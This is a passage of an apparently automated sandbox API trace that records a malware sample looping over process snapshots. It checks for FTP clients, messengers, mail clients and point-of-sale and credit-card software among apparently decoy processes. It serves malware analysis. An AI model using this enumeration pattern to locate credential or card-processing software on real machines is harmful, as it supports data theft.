out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0237.068] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0237.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0237.071] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0237.108] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0237.109] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0237.111] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0237.112] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0237.114] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0237.116] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0237.117] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0237.119] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0237.123] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0237.124] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0237.126] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0237.127] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0237.129] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0237.130] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0237.131] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0237.133] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0237.134] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0237.149] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.151] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.153] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.154] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.156] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0237.157] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0237.159] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0237.160] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0237.161] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0237.163] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.164] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.166] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.187] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0237.188] CloseHandle (hObject=0x1b08) returned 1 [0237.188] Sleep (dwMilliseconds=0x64) [0237.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0237.335] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.336] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0237.338] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0237.342] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.343] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0237.344] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0237.345] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0237.347] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0237.348] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0237.350] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.351] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.352] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0237.354] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.358] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.359] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.361] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.362] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.364] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.365] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.367] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0237.368] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0237.382] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0237.383] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.385] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0237.386] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0237.388] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0237.389] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0237.390] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0237.392] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0237.393] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0237.394] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.396] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0237.397] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.399] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0237.400] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0237.401] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0237.403] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0237.404] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0237.406] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0237.407] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0237.408] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0237.410] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0237.411] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0237.412] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0237.414] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0237.415] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0237.450] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0237.452] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0237.453] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0237.454] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, 